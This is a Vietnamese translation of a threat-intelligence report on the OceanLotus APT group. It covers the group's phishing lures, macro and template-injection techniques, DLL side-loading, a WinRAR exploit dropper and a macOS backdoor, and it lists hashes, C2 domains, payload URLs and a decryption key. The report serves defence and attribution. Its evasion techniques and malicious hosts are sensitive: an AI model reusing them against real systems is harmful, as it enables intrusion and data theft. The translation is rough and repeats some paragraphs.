[Bản dịch] Những cuộc tấn công của Oceanlotus vào Đông Nam Á: sự phát triển của những mục tiêu, kỹ thuật và phương thức

Tổng quan

Bản tiếng Trung tại đây

OceanLotus là một Nhóm APT có nền tảng là người Việt Nam. Nhóm này lần đầu tiên được tiết lộ và đặt tên bởi SkyEye Team vào tháng 5 năm 2015. Các hoạt động tấn công của nhóm có thể được bắt nguồn từ tháng 4 năm 2012. Mục tiêu bao gồm những tổ chức hàng hải, công trình xây dựng hàng hải, viện nghiên cứu khoa học và doanh nghiệp vận tải biển của Trung Quốc.

Trên thực tế, theo báo cáo của nhiều hãng bảo mật, OceanLotus cũng từng tấn công một số quốc gia, trong đó có Campuchia, Thái Lan, Lào, thậm chí một số nạn nhân tại Việt Nam như các lãnh đạo bất đồng ý kiến, truyền thông, công ty bất động sản, doanh nghiệp nước ngoài và ngân hàng.

RedDrip Team (trước đây là SkyEye Team) đã đến OceanLotus để theo dõi cường độ cao, hoạt động nhóm, đã tìm thấy nó trong tương lai gần ở các quốc gia Bán đảo Đông Dương kể từ năm 2019, hoạt động tấn công mới nhất được sử dụng trong các tệp tải khởi chạy ban đầu và tấn công bằng công nghệ, và kết hợp với dữ liệu tình báo về mối đe dọa QiAnXin (Công ty TNHH Tập đoàn Công nghệ Kỳ Anh Tín - 奇安信科技集团股份有限公司) , liên kết với một loạt cuộc tấn công.

Trong báo cáo này, chúng tôi chia sẻ tóm tắt về các kỹ thuật tấn công mới nhất, tải trọng tấn công - attack payloads và các cuộc tấn công liên quan của OceanLotus, hy vọng rằng chúng ta có thể cùng nhau nâng cao hiểu biết về nhóm OceanLotus, một nhóm APT cực kỳ tích cực.

Tấn công các nước

Sau đây là danh sách các vụ tấn công điển hình nhằm vào một số quốc gia trên Bán đảo Đông Dương kể từ cuối năm 2018. Đối với các ví dụ khác không được đề cập, vui lòng tham khảo danh sách của IOC ở cuối báo cáo này.

Việt Nam

Tập tin nén mồi

Ngày 01/04/2019, RedDrip đã phát hiện một file tên tiếng Việt là "Hop dong sungroup.rar" trong quá trình theo dõi hàng ngày các hoạt động tấn công của OceanLotus.

Bản tiếng Anh là "Sun Group contract". Gói nén chứa winword.exe được đổi tên thành “Noi dung chi tiet hop dong sungroup can chinh sua.exe”.

Ngoài ra, chúng tôi còn liên kết với một tệp mồi khác là SUN_GROUP_CORPORATION tạm dịch là “Tập đoàn Sun Group”. Tên tệp trong gói zip như sau: Noi dung can xac thuc va sua gui den CONG TY CO PHAN TAP DOAN MAT TROI Bo Tai Chinh.exe

Hóa ra Sun Group thực sự là một trong những nhà phát triển bất động sản lớn nhất tại Việt Nam.

Cả hai mẫu đều do Việt Nam tải lên. Do đó, chúng tôi suy đoán rằng nhóm OceanLotus đang tiến hành các cuộc tấn công lừa đảo nhằm vào nhân viên của Sun Group.

Ngoài việc nhắm mục tiêu vào ngành bất động sản Việt Nam, chúng tôi cũng phát hiện ra rằng nhóm này đã nhắm mục tiêu vào Ngân hàng Nhà nước Việt Nam trong các cuộc tấn công lừa đảo:

Tên tệp nén của các mẫu liên quan được gọi là CPLH-NHNN-01-2019.rar. Ngày tương ứng của các mẫu là ngày 22 tháng 1 năm 2019 và cuộc tấn công rất có thể xảy ra trong khoảng thời gian tương tự.

Tên tiếng Trung của gói nén là: "越南国家银行-01-2019.rar" ( NganhangNhanuocVietNam - 01-209.rar) và  winword.exe trong tệp  được đổi tên thành "ChiPhiLienHoanNHNN-BC2019.exe", tạm dịch là "Ngân hàng Nhà nước Việt Nam SBV-BC 209.exe".

SBV - State Bank of Vietnam - Ngân hàng Nhà nước Việt Nam (tên viết tắt: SBV hoặc NHNNVN) và BC thực sự đề cập đến B2C, nghĩa là thanh toán của bên thứ ba. (theo mình BC là viết tắt của Báo Cáo ).

Cuộc tấn công có khả năng được thực hiện nhằm vào những nhân viên nội bộ của ngân hàng, tương tự như quá trình truyền tài liệu được ngụy trang dưới dạng thanh toán của bên thứ ba trong ngân hàng.

Ngoài ra, còn có thông tin liên quan đến phần mềm diệt vi-rút thông qua việc ngụy trang fishing.

Tên gói nén: "Gui lai cho MS.MAI post content kaspersky.rar" (trả lại MS. Nội dung bài đăng MAI kaspersky)

Chúng tôi cũng thấy tinh dầu là một chủ đề để fishing:

"Tinh dầu cần mua" (yêu cầu tinh dầu), tệp PE trong gói được gọi là "chi tiết mua bán"

Tài liệu mồi

Gói nén ở trên chứa mồi tên Kaspersky, và cũng có một tên tương tự "Content marketing Kaspersky.doc" trong tài liệu mồi. Sau khi mở tài liệu, nó sẽ được hiển thị như sau, kích hoạt phương thức tấn công macro cho phiên bản tiếng Việt khi click chuột vào.

Ngoài ra, chúng tôi cũng phát hiện ra rằng OceanLotus đã phát động một số lượng lớn các chiến dịch lừa đảo tấn công được ngụy trang dưới dạng sơ yếu lý lịch mà chúng tôi đặt tên nội bộ là

hoạt động của OceanCV, trực tiếp phơi bày 3 phương thức tấn công macro thường được sử dụng bởi OceanLotus.

Trước hết, chúng tôi phân tích tên mẫu. Có thể thấy, các tên mẫu đều bắt đầu bằng CV và có đặc điểm đặt tên. Có ba loại chính:

1, CV- tên (ví dụ: CV-nguyenquynhchi.docx)

2. CV- tên - vị trí (ví dụ: CV-AnthonyWei- dịch vụ khách hàng.docx)

3. CV- số ngẫu nhiên + tiếng Anh (ví dụ: Cv-103237-ewqdsd.doc)

Điều đáng chú ý là một số mẫu sẽ hiển thị danh tính cho biết sự cần thiết phải bật macro sau khi mở:

Tuy nhiên, khi bạn kéo thanh cuộn xuống, bạn sẽ thấy sơ yếu lý lịch được viết bằng tiếng Việt, điều này đúng với hầu hết các mẫu trong chuỗi hoạt động và sơ yếu lý lịch không nhất quán.

Và những sơ yếu lý lịch lừa đảo mẫu này sử dụng các phương pháp khác nhau. Một số sử dụng macro OceanLotus MSO (RedDrip có tên nội bộ MSOMacro)

Một số sử dụng kỹ thuật chèn mẫu:

Một số đã sử dụng kỹ thuật chuyển đổi mã macro thành phông chữ 1 điểm và ẩn nó trong tài liệu (sau này được nâng cấp lên phông chữ 1 điểm màu trắng, RedDrip có tên nội bộ là OHNMacro)

Trong các phần tiếp theo, chúng tôi sẽ phân tích chi tiết cách sử dụng của ba macro này.

Theo loạt mẫu sơ yếu lý lịch này, chúng tôi đã so sánh ba loại tài liệu vĩ mô với các mẫu tương đồng, kết hợp với các kích thước khác nhau và cuối cùng phát hiện ra rằng có một số lượng lớn các mẫu macro Độc hại dành riêng cho OceanLotus. Để biết chi tiết, hãy xem phần liên quan về các mẫu Office.

Khai thác lỗ hổng của Eternal Blue

Chúng tôi cũng phát hiện ra rằng OceanLotus đã sử dụng loạt lỗ hổng "Eternal Blue" để nhắm mục tiêu vào các công ty ở Việt Nam cung cấp phần mềm cho chính phủ.

Trang mạng: https://www.tandan.com.vn/portal/home/default.aspx

Công ty sẽ cung cấp cho chính phủ các máy chủ mail, hệ thống cơ sở dữ liệu chính thức, hệ thống quản lý công dân và hơn thế nữa.

Sau khi tấn công thành công, nó sẽ phát tán Trojan. Trong báo cáo "nghi ngờ" về các hoạt động tấn công ban đầu của tổ chức "OceanLotus" chống lại các trường cao đẳng và đại học trong nước "do chúng tôi biên soạn năm ngoái, những Trojan  đã sử dụng eternal blue để tấn công các trường cao đẳng và đại học là nhất quán.

https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/

Tấn công lừa đảo bằng cách khai thác lỗ hổng WinRAR

Ngoài các payload độc hại truyền thống lợi dụng cơ chế đen trắng, payload độc hại xâm nhập vào các tweet và website, OceanLotus còn lợi dụng lỗ hổng Winrar mới nhất để khởi động các cuộc tấn công vào Việt Nam.Dưới đây là một trong những trường hợp chúng tôi nắm bắt được:

Tên gói nén là "TUT_Photoshop_scan_Bank_ID.rar"

Từ tập tin trích xuất lỗ hổng kích hoạt mẫu, tên của nó được gọi là CocCocUpated.exe

COCCOC là một công ty công nghệ mới nổi tại Việt Nam được thành lập vào năm 2013, cung cấp dịch vụ công cụ tìm kiếm và trình duyệt web trực tuyến, ngôn ngữ chính được sử dụng là tiếng Việt và tiếng Anh, dịch vụ tìm kiếm hoàn thiện nhất tại Việt Nam, trình duyệt dựa trên sự phát triển của Google Chromium, hỗ trợ nền tảng Windows, iOS.

Thông qua phân tích, chúng tôi thấy rằng đó là khung Trojan ban đầu của OceanLotus và chúng tôi cũng đưa nó vào phần phân tích mẫu để phân tích riêng biệt.

Tất nhiên, ngoài mồi nhử trên, chúng tôi còn nhận thấy OceanLotus sẽ sử dụng phương pháp nhúng MP4 vào gói nén để khai thác và trình chiếu. Nói nôm na, tên của tệp zip tạm dịch là "cảnh phim bom tấn độc quyền từ Bệnh viện Chợ Rẫy", Chợ Rẫy ám chỉ Việt Nam, Bệnh viện Đa khoa Thành phố Hồ Chí Minh (Chợ Rẫy), bệnh viện đa khoa lớn nhất tại Thành phố Hồ Chí Minh, Việt Nam.

Gói chứa hai tệp MP4, một trong số đó giống hệt với tên gói (Doc qyen Hinh anh Tong Trongj tai benh vien Cho Ray.rar) và một video được dịch là "Doc quyen Phe nhom bat dau ban nhan su sau tin dot quy.mp4"

Tương tự, cái đã phát hành là CocCocUpdated.exe

Nhưng phương pháp phân phối của nó là đưa nó qua đĩa mạng.

Trojan mới này sẽ được phân tích chi tiết trong phần phân tích mẫu.

MAC Backdoor

Ngoài việc nhắm mục tiêu đến Việt Nam trên nền tảng Windows, OceanLotus còn tấn công người dùng Việt Nam trên nền tảng MacOS. Các mẫu trong hình bên dưới là các bản phát hành điển hình gần đây, sử dụng các bản cập nhật trình duyệt, gói cập nhật cài đặt Flash, gói cài đặt phông chữ, được ngụy trang dưới dạng tài liệu để thực sự tấn công trình cài đặt.

Điều thú vị là khi chúng tôi phân tích các mẫu được ngụy trang thành Firefox, nó sẽ hiển thị giao diện cài đặt Firefox sau khi mở. Nhấp đúp vào biểu tượng của Firefox và Trojan sẽ được thực thi:

Khi bạn nhấp vào bản cập nhật, ngay cả khi bạn bị ngắt kết nối internet, thanh tiến trình download giả sẽ vẫn xuất hiện.

Đây là giao diện giả mạo do kẻ tấn công vẽ ra:

Một lần nữa, trong các phần tiếp theo, chúng tôi sẽ phân tích cho loạt mẫu MacOS nhằm vào Việt Nam này.

Campuchia

Sau đây là vụ tấn công mới nhất vào Campuchia của OceanLotus trong năm nay, tên file là "Report-No.0162(02 Pages).doc", tương ứng với Tên tiếng Trung là: 报告 No.0162（02 页）

Quá trình chạy mẫu được thể hiện trong hình bên dưới:

Các mẫu được liên kết với cùng một nguồn gốc như sau::

MD5	Filename	Tạo thời gian
56b5a96b8582b32ad50d6b6d9e980ce7	Request Comment on	2019-03-18 04:12:00
3fd2a37c3b8d9eb587c71ceb8e3bb085	Số 039714(cdri).doc	2019-03-25 04:33:00

Và mẫu liên quan Request Comment on UYFC.doc (yêu cầu bình luận về UYFC) chống lại Campuchia.

UYFC thực sự là Liên đoàn Thanh niên Campuchia | Tổ chức phi chính phủ UYFC như một cách để tấn công những người có thể liên quan đến hội nghị.

Ảnh chụp màn hình tài liệu:

Số 039714(cdri).doc

Rõ ràng là cuộc tấn công vào Campuchia cũng sử dụng macro OHN.

Ngoài việc sử dụng các tài liệu để tấn công, OceanLotus cũng đã sử dụng các mẫu MacOS để tấn công Campuchia vào năm ngoái. Mẫu liên quan: "Scanned Investment Report-July 2018.zip" (Scan Báo Cáo Đầu Tư - Tháng 7/2018).

Thái Lan

Các ví dụ điển hình về các cuộc tấn công của OceanLotus vào Thái Lan kể từ năm 2019 như sau:

MD5	Filename	Create time
4c30e792218d5526f6499d235448bdd9	Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.doc	2019-01-21 02:25:00
d8a5a375da7798be781cf3ea689ae7ab	Program Retreat.doc	2019-01-14 03:50:00

Nó được đặt tên Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.doc.

Và cuộc họp đã thực sự diễn ra thành công tại Thái Lan vào ngày 6 tháng 4 năm 2019. Từ thời gian tạo và thời gian tải lên của tài liệu (22-03-2019) có thể thấy tổ chức OceanLotus có khả năng nắm bắt thời sự rất nhanh, thời gian chuẩn bị tương đối dài.

Tài liệu thứ hai, Program Retreat, có thể nhằm vào quân đội, nhưng do ý nghĩa của cái tên

Mở rộng và không xác nhận ý định thực sự của kẻ tấn công.

Và nội dung tài liệu của hai tệp trong bảng trên là như nhau, hình dưới đây là ảnh chụp màn hình sau khi khôi phục font chữ shellcode trong tài liệu:

Nó cũng SỬ DỤNG macro OHN.

Phân tích mẫu

Luồng tấn công tài liệu "MSO macro"

"Macro MSO" của OceanLotus có điểm chung. Chúng tôi đã phân tích một mẫu và có thể thấy rằng mã macro được trích xuất như sau:

Đầu tiên, nó sẽ thêm dữ liệu thông qua biến Data, sau đó giải mã nó thông qua base64, giải mã mã  và giải phóng nó vào msohtml.log và sao chép wscript.exe vào windows\SysWOW64\msohtml.exe:

Thực thi tập lệnh msohtml.log bằng cách sao chép msohtml.exe (nghĩa là wcript.exe), như thể hiện trong hình dưới đây:

Và tạo các tác vụ theo lịch trình:

Nội dung của đoạn script msohtml.log như sau, nó sẽ XOR dữ liệu trong mảng cs với 518 và thực thi nó:

Đoạn mã được giải mã như trong hình, nó sẽ XOR các phần tử trong mảng cs thành 415 rồi thực thi mã độc:

Sau khi giải mã mã độc như trong hình: sẽ được tải về từ https://open.betaoffice.net/cvfemale.png và thực thi.

Luồng tấn công tài liệu "OHN macro"

Trích xuất mã macro từ mẫu này, mở tài liệu word, bạn sẽ được nhắc bật macro và chức năng này sẽ được thực thi sau khi bật macro:

Sau đó, nó sẽ sao chép tài liệu office của chính nó sang temp và đặt tên ngẫu nhiên, như thể hiện trong hình:

Sau đó sửa đổi bảo mật của macro đăng ký:

Lấy dữ liệu đoạn thứ năm từ dưới cùng của tổng số đoạn văn (tổng cộng 5 đoạn dữ liệu, 2 dòng trống và 3 với dữ liệu hex), chuyển đổi từ hex sang bin, thêm nó vào mã macro của tệp mới, rồi đặt phương thức x_N0th1ngH3r3 để thực thi mã macro sau 1 giây:

Tệp định dạng này là văn bản 1 pound, không thể nhìn thấy bằng mắt thường, như thể hiện trong hình:

Đoạn đầu tiên xóa dữ liệu sau khi định dạng:

Sau khi dữ liệu được chuyển đổi thành bin, nó sẽ được chuyển đổi thành mã macro thứ hai và mã macro đầu tiên sẽ thực thi hàm x_N0th1ngH3r3, như thể hiện trong hình:

Thực thi mã macro của đoạn áp chót thứ 3 theo cách tương tự, như thể hiện trong hình:

( 倒数第三段从这开始  - The penultimate paragraph starts here )

Nó cũng bắt đầu với chức năng này:

Lấy dữ liệu của đoạn áp chót, như trong hình:

Dữ liệu như sau:

倒数第一段 - Đoạn áp chót

Sau đó ghi vào bộ nhớ để thực hiện:

Sau khi dữ liệu hex được chuyển đổi thành bin, nó là shellcode được sử dụng bởi OceanLotus, như thể hiện trong hình:

Tệp tin cấu hình:

Phương pháp tải shellcode qua bộ nhớ macro ba lần này chủ yếu là để chống lại quá trình quét tĩnh của phần mềm anti virus.

Quy trình tấn công Injection Documents

Tài liệu chèn mẫu của OceanLotus có tính phổ biến, sau khi khởi động tài liệu, nó sẽ tải XXX.XXX/XXX.png và thực hiện các thao tác sau.

Để đưa ra một ví dụ về một trong những cuộc tấn công này, fdsw.png là một tài liệu phức hợp văn phòng: (d497bd06b34a046841bb63d3bf20e605)

Giải nén macro, lúc đầu, nó sẽ đánh giá hệ thống là 32-bit hay 64 dựa trên việc tệp SysWOW64\cmd.exe có tồn tại hay không:

Tùy thuộc vào hệ thống, tệp được lấy ra khỏi ô, base64 được giải mã và thả xuống: %appdata% main_background-png:

Tùy theo các hệ thống khác nhau, tệp được đưa ra khỏi cell, được giải mã bởi base64 và được đưa vào: %appdata%\main_background.png:

Sau đó chọn các cách ghi sổ đăng ký khác nhau theo các chữ số hệ điều hành khác nhau, các CSID bị tấn công là "{2DEA658F-54C1-4227-AF9B-260AB5FC3543}

Theo CSID này, đó là CSID của DLL bị tấn công: %SystemRoot%\System32\ playsndsrv.dll

Dll này được sử dụng để phát âm thanh.

Nội dung trích xuất của nội dung base64 trong cell như sau:

Base64 giải mã một với PE 32-bit, Dllmain sẽ áp dụng 0x34aca không gian bộ nhớ byte, sau đó ghi shellcode tại  tại 0x10012760 được ghi vào bộ nhớ và được thực thi bởi luồng:

Shellcode chuyển đến con trỏ tại offset 0xfc8 khi tham số được truyền cho hàm của sub_160018:

Và địa chỉ tại offset 0xfc8 chứa các tham số dòng lệnh và PE:

Chức năng của sub_160018 chủ yếu là tải PE sau vào bộ nhớ, sau đó truyền dòng lệnh để thực thi theo các tham số dòng lệnh. Hình dưới đây là mã nhận các tham số dòng lệnh cho PE:

Yêu cầu URL được chuyển qua và tải dữ liệu đã tải xuống vào bộ nhớ sau khi được DES giải mã.

Tìm thêm các mẫu thông qua phân tích liên kết:

Sắp xếp theo thời gian biên dịch như sau:

Thông qua bảng so sánh, các dòng lệnh của mẫu đầu tiên và các mẫu khác là khác nhau, vì vậy chúng ta có thể biết rằng đó phải là các cuộc tấn công khác nhau. Mẫu này, là phiên bản có chú thích, sẽ tải shellcode vào bộ nhớ theo cách tương tự, chức năng của shellcode là tải tệp PE chứa trong tệp trong bộ nhớ:

PE có trong tệp được tìm thấy trong bộ công cụ của tin tặc. Tên tệp là CMD [w7][x64].

Chức năng của mẫu này là thực thi các MCOD. Exe (đây là tên tệp exe của chương trình tiện ích trắng được sử dụng bởi OceanLotus) thông qua CMD [w7][x64]. Exe chứa trong tập tin, trong khi McOds. Exe phải là tệp được phát hành bởi trình nhỏ giọt trước đó.

PE chứa trong tệp được tìm thấy trong bộ công cụ hack có tên tệp: cmd[w7][x64].exe;

Chức năng của mẫu này là thực thi mcods.exe thông qua cmd[w7 ][x64].exe có trong tệp (đây là tên tệp exe của chương trình tiện ích trắng được sử dụng bởi OceanLotus) và mcods.exe phải là tệp do trình dropper trước đó.

Vị trí upload của mẫu này là VN, thời gian upload là 31/07, tên file là msvchr.exe, có thể thấy mẫu này nhắm đến tấn công VN:

Thông qua việc phân tích và so sánh các mẫu này, có thể biết rằng các mẫu này được sử dụng để thực thi các tệp exe trong bộ nhớ và vượt qua chương trình Loader truyền tham số dòng lệnh là một khung mã độc mới được sử dụng trong sáu tháng qua, được sử dụng riêng để phát triển chống lại static kill.

Người ta thấy rằng 2 trong số các mẫu là 10M, được điền toàn 0x20 (dấu cách) ở cuối và được điền vào các tệp lớn để tránh bị tải lên:

Và cách nạp shellcode của các mẫu này có đôi chút khác biệt:

1. Hầu hết các mẫu thực thi shellcode bằng cách tạo luồng

2. Mẫu có thời gian biên dịch sớm nhất được bắt đầu ở dạng dịch vụ, có chú thích và luồng được tạo trong serviceMain để thực thi shellcode.

3. Một số ít mẫu thực thi shellcode trực tiếp trên luồng chính

wwlib DLL Injection

Họ sử dụng winword. Exe trắng sử dụng công nghệ, winword. Exe sẽ tải cùng một thư mục theo mặc định wwlib. .DLL;

Lý do tại sao winword. Exe trắng sử dụng công nghệ, bởi vì winword. Biểu tượng Exe là biểu tượng của từ, và wwlib.dll bị ẩn, vì vậy họ chỉ cần thay đổi winword.

Qua phân tích gói nén CPLH-NHNN-01-2019.rar do Amazon AWS tải xuống, người ta thấy rằng gói nén đã đóng gói tệp trắng winword.exe và wwlib.dll cùng nhau để phân phối.

Họ sử dụng kỹ thuật khai thác winword.exe,  winword.exe sẽ tải xuống wwlib.dll trong cùng một thư mục theo mặc định.

Lý do tại sao chúng tôi sử dụng công nghệ tận dụng trắng winword.exe là vì icon  winword.exe là icon của word và wwlib.dll bị ẩn, vì vậy họ chỉ cần sửa đổi winword.exe thành tên gì đó gây nhầm lẫn và để nạn nhân giải nén sau khi chỉ tìm thấy duy nhất 1 exe có biểu tượng word thì mở lên và chạy:

Mã độc của wwlib.dll nằm trong hàm xuất FMain, khi winword.exe mở lên mặc định sẽ gọi hàm xuất FMain, mã độc sẽ được thực thi, sau đó base64 giải mã shellcode có sẵn rồi thực thi trong luồng chính:

Vị trí lưu trữ shellcode được mã hóa Base64 trong mẫu:

Người ta thấy rằng shellcode được giải mã và shellcode trước đó được tải theo cùng một cách. Phần bù dữ liệu 0x6b6 được chuyển đến hàm sub_16 dưới dạng tham số:

Người ta thấy rằng phương thức tải của shellcode đã giải mã giống với phương thức của shellcode trước đó và dữ liệu tại offset 0x6b6 được truyền  đến hàm sub_16 dưới dạng tham số:

Hàm sub_16 có chức năng giải mã dữ liệu đằng sau 0x6b6, giải mã lớp shellcode thứ hai và thực thi nó. Hình bên dưới hiển thị lớp shellcode thứ hai được giải mã:

Shellcode lớp thứ hai giải mã shellcode lớp thứ ba thông qua DES, khóa là "asfahdiuqhu93ye7891h9ubioufcf":

Lối vào của lớp shellcode thứ ba giống như lối vào của hai shellcode trước. Nó cũng sử dụng call/pop để tìm vị trí mà shellcode được tải vào bộ nhớ, sau đó tìm nạp dữ liệu đằng sau mã (độ lệch 0x8c6) và chuyển dữ liệu đó tới hàm sub_16 dưới dạng tham số: https[:]//office.allsafebrowsing.com/AwPT:

Shellcode tải xuống tệp từ https[:]//office.allsafebrowsing.com/AwPT, sau đó thực thi nó trong bộ nhớ. Hình dưới đây cho thấy UA được sử dụng để tải xuống tệp:

Tệp AwPT đã tải xuống là mô-đun shellcode của cobaltstrike:

Hình dưới đây cho thấy thuật toán để giải mã dữ liệu bổ sung. Thuật toán này giống như mô-đun shellcode của cobaltstrike. Sự khác biệt là phần bù đã lùi lại 8 byte:

Dữ liệu được giải mã là một mô-đun đèn hiệu, như thể hiện trong hình:

Giải nén thông tin file cấu hình như sau:

MAC Backdoor

Đối tượng phân tích là một backdoor MAC được ngụy trang dưới dạng trình duyệt.

Cấu trúc tệp giải nén như sau, đây là gói cài đặt macOS, như trong hình:

Sau khi mở sẽ hiển thị giao diện cài đặt Firefox, bạn nhấn đúp chuột vào biểu tượng Firefox để thực hiện quy trình Dropper:

Một giao diện giả mạo Firefox sẽ hiện lên, nhấn vào cập nhật, kể cả khi ngắt mạng vẫn có thanh tiến trình tải xuống do kẻ tấn công giả mạo:

Đây là giao diện giả mạo mà kẻ tấn công vẽ ra:

Sau khi Dropper đang chạy, APP sau sẽ được tạo trong thư mục Thư viện để khởi động:

/Users/username/Library/LaunchAgents/com.apple.spell.agent.plist

Thư mục khởi động trong app trỏ đến tệp Spellagentd trong thư mục này: /Users/username/Library/Spelling/. Tệp này là tệp bin của OSX. Mã được đóng gói và shellcode sẽ được giải mã và thực thi trong bộ nhớ, như thể hiện trong hình:

Sau khi thực thi nó sẽ kết nối ngược lại địa chỉ: rio.imbandaad.com, và gửi gói dữ liệu lên server thông qua Post request: http://rio.imbandaad.com/v3/yQ/r/eiCu1gd6Qme.js

Nhưng địa chỉ đó không còn hiệu lực. Thông tin chữ ký của App như sau: 

Identifier=org.mozilla.firefox Format=bundle with Mach-O universal (i386 x86_64) CodeDirectory v=20200 size=623 flags=0x0(none) hashes=24+3 location=embedded Hash type=sha1 size=20 CDHash=f1ebdfdfa0c6ab158bc619350c54d3e337a5d849 Signature size=4233 Authority=Developer ID Application: Melinda Cline (P74QRJXB2F) Authority=Developer ID Certification Authority Authority=Apple Root CA Signed Time=Mar 22, 2018, 9:10:20 PM Info.plist entries=24 TeamIdentifier=P74QRJXB2F Sealed Resources version=2 rules=12 files=11 Internal requirements count=1 size=212

Phân tích và liên kết CocCocUpdate

CocCocUpdate là một Dropper, được giải phóng vào thư mục startup bằng cách sử dụng tệp nén được xây dựng bằng cách khai thác lỗ hổng CVE-2018-20250. Anh chụp màn hình của gói nén như sau:

Sau khi khởi động lại, hệ thống sẽ thực thi. Tệp tương ứng là CocCocUpdate.exe. Năm 2015, chúng tôi đã giới thiệu phiên bản Dropper truyền khóa ngẫu nhiên thông qua tham số dòng lệnh. CocCocUpdate.exe này đã được cải tiến để truyền biến môi trường chuyển khóa ngẫu nhiên

Các bước cụ thể như sau:

1. Lấy đường dẫn đầy đủ của CocCocUpdate.exe đã thực thi và lưu vào biến môi trường có giá trị "C091A8C8" để các chương trình sau có thể đọc được.

2. Tạo ngẫu nhiên một khóa 128 byte và lưu trữ nó trong biến môi trường có giá trị là "DB99050C"; nó được sử dụng để mã hóa dữ liệu tài nguyên (shellcode) đằng sau chính nó.

3. Mã hóa dữ liệu ở 0x40E000 bằng một khóa ngẫu nhiên, ghi tệp PE đã sửa đổi vào thư mục Temp và thực thi nó thông qua CreateProcess:

Hình bên dưới là kết quả so sánh file gốc với file mã hóa, có thể thấy đoạn mã không thay đổi nhưng mảng biến toàn cục tại 0xd000 được mã hóa bằng một khóa ngẫu nhiên.

4. Nếu tệp được pack, nó sẽ giải mã và giải phóng tệp được đóng gói (khóa nằm trong 64 byte cuối cùng) từ tài nguyên có loại tài nguyên 10 và tài nguyên số 1, chẳng hạn như tài liệu Word hoặc tệp thông thường, sau đó thực thi nó thông qua ShellExectue, tệp này không sử dụng tệp giải mã giải phóng gói nên ID bị sai:

5. Quá trình tạm thời được thực hiện trước tiên sẽ xác định xem có một biến môi trường "C091A8C8" đã đặt hay không. Nếu có, điều đó có nghĩa là nó đã được mã hóa bởi trình Dropper ban đầu. Quá trình này sẽ đọc khóa 128 bit được tạo ngẫu nhiên từ biến môi trường "DB99050C", giải mã mã ở 0x40e000, sau đó giải mã và giải nén một lớp nữa. Bởi vì mã có một lớp mã hóa và nén trong Dropper ban đầu:

Giải nén:

6. Tệp được giải mã là tệp PE, tệp này sẽ được thực thi trong bộ nhớ sau khi giải mã, như thể hiện trong hình

Mã này sẽ giải phóng 3 tệp vào thư mục c:\program files\microsoft\windows\system restore\

Sau đó tạo một dịch vụ và trỏ đến tệp rstrui.exe:

rstrui.exe là một trình loader được viết bởi kẻ tấn công để giả mạo biểu tượng Microsoft Windows System Restore (Khôi phục hệ thống Windows của Microsoft):

Nó chịu trách nhiệm chính cho việc tải tệp {9FBAA883-1709-4DE3-8C1B-48683F740A5F}.clsid trong cùng một thư mục thông qua rundll32. Các tham số cũng được chuyển qua các biến môi trường. Phương pháp này thường được nhóm OceanLotus sử dụng vào năm 2017

Tệp có tên {9FBAA883-1709-4DE3-8C1B-48683F740A5F}.clsid là một DllLoader và thông tin PE như sau:

Chức năng của dll này chủ yếu là giải mã và tải shellcode có tên {9FBAA883-1709-4DE3-8C1B-48683F740A5F} trong cùng thư mục, như trong hình

Nhập hàm sub_10001480, nội dung của tệp sẽ được giải mã và PE sẽ được tải vào trong bộ nhớ:

PE sau khi giải mã trong bộ nhớ được hiển thị trong hình dưới đây:

DllMain tạo một luồng để thực thi hàm export Version. Trong hàm Version, chức năng điều khiển từ xa sẽ được thực thi mọi lúc. Nếu không thành công, nó sẽ tiếp tục ngủ trong 6 giây (điều này có nghĩa là thời gian ngủ trong 6 giây là quá ngắn):

Sau đó, một số nhỏ hơn 4 sẽ được tạo ngẫu nhiên và C2 sẽ được chọn ngẫu nhiên, như thể hiện trong hình:

Một trong những chức năng để giải mã C2 như sau:

Kết nối lại 4 tên miền như sau:

mages.ucange.com

preload.ointalt.com

maintenance.allidayser.com

report.cottallid.com

Hàm băm hash của mẫu được liên kết với tên miền như sau:

2ea902abe453b70cf77e402cc16eb552

cc7b9ee1b026e16a9d37e3988a714479

e60c35dd36c9f525007955e6b3a88b82

Các tệp được đóng gói trong mẫu cùng nguồn gốc này:

Nội dung file office đi kèm cc7b9ee1b026e16a9d37e3988a714479 như sau:

Dịch:

Nội dung của các tệp Office đi kèm với 2ea902abe453b70cf77e402cc16eb552 như sau:

Dịch:

Lưu đồ của Dropper như sau:

So sánh giữa phiên bản Dropper này và phiên bản 2015 của Dropper:

1. Dropper năm 2015 đã truyền khóa giải mã được tạo ngẫu nhiên thông qua các tham số dòng lệnh, trong khi phiên bản Dropper này là truyền khóa thông qua biến môi trường giữa các chuỗi quy trình (API là SetEnvironmentVariableW và GetEnvironmentVariableW)

2. Máy ảo phát hiện sự hiện diện của phiên bản 2015 và máy ảo phát hiện không tồn tại của phiên bản này.

Hình bên dưới là: Phiên bản Dropper của OceanLotus năm 2015, chuyển key qua "-ping"

Hình ảnh sau đây cho thấy: Phiên bản Dropper này lưu trữ khóa được tạo ngẫu nhiên trong biến môi trường:

Phân tích tương quan

Mẫu Trojan

Thông qua phân tích backdoor chung của OceanLotus, một số lượng lớn các mẫu tương đồng đã được tìm thấy thông qua các tính năng trong mã của nó:

MD5	Thời gian biên dịch	Kích thước tệp	Tên mô-đun
AC5F18F1C20901472D4708BD06A2D191	Trong 2018-06-13 s, 11:33:33	93184	DllHijack. .DLL
221e9962c9e7da3646619ccc47338ee8	Trong 2018-06-25 s, 02:35:46	93184	DllHijack. .DLL
26ea45578e05040deb0cc46ea3103184	Trong 2018-07-02 s, 02:11:55	142336	DllHijack. .DLL
200033d043c13b88d121f2c1d8d2dfdf	Trong 2018-07-09 s, 03:00:10	2053632	DllHijack. .DLL
9972111cc944d20c9b315fd56eb3a177	Trong 2018-07-13 s, 03:48:03	142336	DllHijack. .DLL
bf040c081ad1b051fdf3e8ba458d3a9c	Trong 2018-07-23 s, 03:11:16	93184	DllHijack. .DLL
6c2a8612c6511df2876bdb124c33d3e1	Trong 2018-07-23 s, 04:50:51	93184	DllHijack. .DLL
7dace8f91a35766e9c66dd6258552b02	Trong 2018-07-23 s, 12:59:23	142336	DllHijack. .DLL
C9093362A83B0E7672A161FD9EF9498A	Trong 2018-08-07 s, 03:12:39	92672	DllHijack. .DLL
38f9655c72474b6c97dc9db9	Trong 2018-08-09 s, 10:11:58	93184	DllHijack. .DLL
4bb4d19b42e74bd11459c9358c1a6f01	Trong 2018-08-13 s, 02:21:13	168960	DllHijack. .DLL
F42611ac0ea2c66d9f27ae14706c1b00	Trong 2018-08-13 s, 08:46:56	92672	DllHijack. .DLL
